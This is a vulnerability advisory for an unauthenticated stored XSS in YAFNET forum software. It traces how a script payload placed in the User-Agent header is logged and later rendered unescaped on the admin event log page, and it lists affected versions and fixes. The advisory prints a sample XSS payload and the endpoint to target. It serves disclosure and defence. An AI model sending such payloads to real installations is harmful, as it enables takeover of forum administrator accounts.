YAFNET Unauthenticated Stored XSS via User-Agent Header

YAFNET is vulnerable to a stored (second-order) cross-site scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious JavaScript code into the User-Agent header of an HTTP request. This input is then logged into the EventLog.Description column of the database whenever an error occurs on the server. The admin event log page deserializes the JSON and displays the UserAgent value without proper encoding. When an administrator views the event log page, the injected JavaScript is executed in the administrator’s browser session, potentially leading to account takeover or other malicious activities. This vulnerability affects YAFNET.Core versions 4.0.0-beta01 through 4.0.4 and versions up to 3.2.11. The vulnerability was reported on 2026-05-05 and assigned CVE-2026-43938.

Attack Chain

1. An unauthenticated attacker sends a malicious HTTP request to the /api/Attachments/GetAttachment endpoint with a crafted User-Agent header containing XSS payload (e.g., <img src=x onerror=alert('XSS')>).
2. The YAFNET application encounters an error when processing the request, triggering an exception.
3. The YAFNET.Core/Logger/DbLogger.cs captures the request’s User-Agent header.
4. The User-Agent string is serialized into a JSON object using JsonConvert and stored in the EventLog.Description column of the dbo.EventLog table in the database.
5. An administrator navigates to the /Admin/EventLog page.
6. The YetAnotherForum.NET/Pages/Admin/EventLog.cshtml.cs deserializes the JSON from the EventLog.Description column.
7. The FormatStackTrace() function extracts the UserAgent value from the deserialized JSON.
8. The EventLog.cshtml Razor view uses @Html.Raw to render the UserAgent value directly into the HTML, without proper encoding, resulting in the execution of the attacker-controlled JavaScript in the administrator’s browser.

Impact

A successful XSS attack can allow an unauthenticated attacker to execute arbitrary JavaScript code in the context of an administrator’s session. This can lead to a complete forum takeover, including creating new administrative accounts, modifying site-wide settings, and exfiltrating user data from admin-only endpoints. Due to the unauthenticated nature of the vulnerability, it is readily exploitable at scale and may be automated.

Recommendation

• Apply the patch or upgrade to a version of YAFNET.Core later than 4.0.4 or greater than 3.2.11 to remediate the XSS vulnerability described in CVE-2026-43938.
• Deploy the Sigma rule “Detect YAFNET XSS in Event Log” to your SIEM to identify potential exploitation attempts targeting the User-Agent header.
• Monitor web server logs for requests to /api/Attachments/GetAttachment with suspicious User-Agent headers.